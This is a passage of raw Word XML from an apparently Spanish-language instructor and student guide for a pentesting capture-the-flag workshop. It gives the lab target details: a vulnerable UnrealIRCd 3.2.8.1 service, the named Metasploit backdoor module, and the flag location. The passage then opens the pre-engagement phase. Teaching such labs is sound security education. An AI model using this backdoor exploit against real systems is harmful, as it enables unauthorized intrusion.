        <w:t>2.4 Salida Esperada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC436A7" w14:textId="307E9DA0" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="348"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INSTALACIÓN CTF - MÁQUINA VÍCTIMA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7309D1" w14:textId="3184C63B" w:rsidR="00AB3B38" w:rsidRPr="00A86A33" w:rsidRDefault="005342F0" w:rsidP="005342F0">
      <w:pPr>
        <w:ind w:left="1134"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C450F29" wp14:editId="79E97EE4">
            <wp:extent cx="4506015" cy="2094367"/>
            <wp:effectExtent l="76200" t="76200" r="142240" b="134620"/>
            <wp:docPr id="1145242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37" cy="2100884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7F4FD8" w14:textId="222D0B36" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="348"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>INFORMACIÓN DEL LABORATORIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23062150" w14:textId="54308EEC" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>IP Pública de esta máquina</w:t>
      </w:r>
      <w:r w:rsidR="00AB3B38" w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> EC2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D38BA20" w14:textId="66D9FA4C" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00AB3B38">
      <w:pPr>
        <w:ind w:left="1146"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="005342F0" w:rsidRPr="00A86A33">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB3B38" w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">Ejemplo: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t>54.123.45.67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499F2DDB" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Puerto vulnerable: 6200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAF115B" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Servicio: UnrealIRCd 3.2.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2939D85B" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Exploit: exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2DDE1F" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1506"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Bandera: /root/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C597673" w14:textId="5D38D0C3" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="348"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>COMPARTE CON LOS ESTUDIANTES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1524A3C1" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>IP Objetivo: 54.123.45.67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AAE5BA" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Puerto: 6200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B4B7F0" w14:textId="3FA26243" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="005342F0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="60CAF3" w:themeFill="accent4" w:themeFillTint="99"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:pict w14:anchorId="082448B6">
          <v:rect id="_x0000_i1027" style="width:491.1pt;height:1.8pt" o:hrpct="990" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E015C37" w14:textId="59919B4E" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="006C0703">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PASO 3: Compartir con Estudiantes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B5E5A" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
        </w:rPr>
        <w:t>3.1 Información que Necesitan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5408456D" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:left="1134"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TALLER CTF - INFORMACIÓN DEL LABORATORIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D448933" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>IP de la Máquina Víctima: &lt;TU_IP_PUBLICA&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E20E14" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objetivo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C430894" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:ind w:left="1134" w:firstLine="282"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Obtener la bandera ubicada en /root/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3295BAD8" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Herramientas Necesarias:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352DCDD5" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>- Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E244B" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>- Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200328C4" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:ind w:left="1416"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>- nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0803CC8A" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Puerto a atacar: 6200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39864138" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Pista: El servicio tiene un backdoor conocido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620ED89B" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>¡Buena suerte!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCF5944" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="005342F0">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
        </w:rPr>
        <w:t>3.2 Distribuir Guía</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A07F9D" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="006C0703" w:rsidP="00950546">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve">Comparte el artifact </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>"Guía del Estudiante - Taller CTF Pentesting"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A8AA57" w14:textId="77777777" w:rsidR="005342F0" w:rsidRPr="00A86A33" w:rsidRDefault="005342F0" w:rsidP="006C0703"/>
    <w:p w14:paraId="3AFBC0D5" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="006C0703"/>
    <w:p w14:paraId="0CDAFD31" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="006C0703"/>
    <w:p w14:paraId="71B8651A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="006C0703"/>
    <w:p w14:paraId="37A546D0" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="006C0703"/>
    <w:p w14:paraId="72BA230B" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="006C0703"/>
    <w:p w14:paraId="37DF2C85" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="006C0703"/>
    <w:p w14:paraId="49AEA0B6" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="006C0703"/>
    <w:p w14:paraId="141BC5DC" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="006C0703"/>
    <w:p w14:paraId="0836FC83" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="006C0703"/>
    <w:p w14:paraId="164C71E5" w14:textId="77777777" w:rsidR="006C0703" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="005342F0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="60CAF3" w:themeFill="accent4" w:themeFillTint="99"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="730624BD">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="273368D5" w14:textId="16C08308" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45B0E1" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>TALLER DE PENTESTING - CAPTURE THE FLAG (CTF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2C6385" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:pict w14:anchorId="48766C42">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F2D63C" w14:textId="5486D99C" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Información del Laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A118B71" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Obtener acceso root a la máquina víctima y capturar la bandera en /root/flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1F717A" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP de la Máquina Víctima:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> &lt;REEMPLAZAR_CON_IP_PUBLICA_EC2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67511FDF" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Herramientas Necesarias:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E40A3F3" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Kali Linux (con Metasploit Framework instalado)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE7760" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Conexión a Internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71964609" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>Acceso a la IP pública de la máquina víctima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D09AEE6" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="004812B6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:pict w14:anchorId="0223F10E">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="678774A9" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>FASE 1: PLANIFICACIÓN (PRE-ENGAGEMENT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52935FB2" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>¿Qué es esta fase?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACB0381" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:t>En un pentesting real, esta es la fase donde se firma el contrato, se definen los objetivos, el alcance, las reglas de enfrentamiento y se obtiene la autorización legal para realizar las pruebas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595275E1" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E97132" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Tu "Contrato" para este CTF:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B81290E" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Obtener la bandera ubicada en /root/flag.txt de la máquina objetivo</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alcance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Solo la dirección IP proporcionada</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reglas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Puedes usar cualquier técnica de hacking ético aprendida</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autorización:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> Este es un entorno de laboratorio controlado con permiso explícito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3510E2A4" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00D55B47">
      <w:pPr>
        <w:ind w:left="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Objetivo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A86A33">
        <w:t xml:space="preserve"> &lt;REEMPLAZAR_CON_IP_PUBLICA_EC2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D37E46" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00433E8C" w:rsidP="004812B6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E97132" w:themeFill="accent2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:pict w14:anchorId="37E347BB">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A03552" w14:textId="77777777" w:rsidR="00ED2427" w:rsidRPr="00A86A33" w:rsidRDefault="00ED2427" w:rsidP="00ED2427">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D86DCB" w:themeColor="accent5" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
